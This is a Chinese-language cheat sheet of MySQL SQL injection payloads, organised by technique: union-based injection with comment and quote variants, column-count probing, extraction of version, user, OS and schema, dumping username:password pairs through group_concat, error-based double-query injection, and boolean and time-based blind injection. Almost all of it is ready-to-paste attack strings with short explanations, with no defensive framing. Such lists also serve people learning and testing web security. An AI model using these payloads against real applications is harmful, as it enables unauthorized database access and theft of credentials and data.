MySQL常用SQL注入语句

常规注入

‘ –+
‘ –%20
‘ #
‘ %23
‘ and 1=1 –+
‘ and 1=2 –+
‘ and 1=2 union select * from admin –+
‘ and 1=2 union select * from user –+
‘ and 1=2 union select * from users –+

判断字段数(列数)

‘ order by 1 –+
‘ order by 2 –+
‘ order by 3 –+
‘ order by 4 –+
‘ order by 5 –+
‘ order by 6 –+
‘ order by 7 –+
‘ order by 8 –+
‘ order by 9 –+
‘ order by 10 –+

爆数据库信息,这仅适用于查询列数(字段数)为1的情况

‘ and 1=2 union all select version() –+
‘ and 1=2 union all select user() –+
‘ and 1=2 union all select database() –+

判断操作系统

‘ and 1=2 union all select @@global.version_compile_os from mysql.user –+

数据库权限判断:返回正常只说明 user() 的首字符是 'r'(ASCII 114),仅提示可能是 root 账户,并不能确证;

‘ and ord(mid(user(),1,1))=114 –+

爆数据

‘ and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 –+
‘ and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1–+
‘ and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1–+
‘ and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1–+
‘ and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name –+
‘ and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name –+

不使用注释符

‘ and ‘1
‘ union select 1 and ‘1
‘ union select 1,2 and ‘1
‘ and 1=2 union select 1,version(),3 and ‘1
‘ or ‘1

带括号防注入

‘) –+
‘) –%20
‘) #
‘) %23

双引号防注入

” –+
” –%20
” #
” %23

双引号+括号

“) –+
“) –%20
“) #
“) %23

双查询输入

统计有多少条记录(count(*) 统计的是行数,而不是字段数)

select count(*) from table_name;

随机数生成

select rand();
select rand()*4;

向下取整(floor 返回整数)

select floor(rand());
select floor(rand()*4);

别名

select floor(rand()*4) as query;

分组

select username,password from user group by username;

两次查询

select(select database());

连接字符串concat(str1,str2)

select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;

‘ and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) –+
‘ and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) –+

盲注

bool型盲注

select database();

判断长度

select length(database());

截取字符串substr(str,num1,num2) num1:从第几个开始取;num2:取多少个

select substr(database(),1,1);

ascii码

select ascii(substr(database(),1,1));

‘ and 1<2 –+
‘ and (ascii(substr((select database()),1,1)))=98–+

时间型盲注

睡眠

select sleep(1);

进行判断

select if((select database())=”bloodzero”,sleep(10),null);

‘ and sleep(10) –+
‘ and if((select database())=”bloodzero”,sleep(10),null)–+
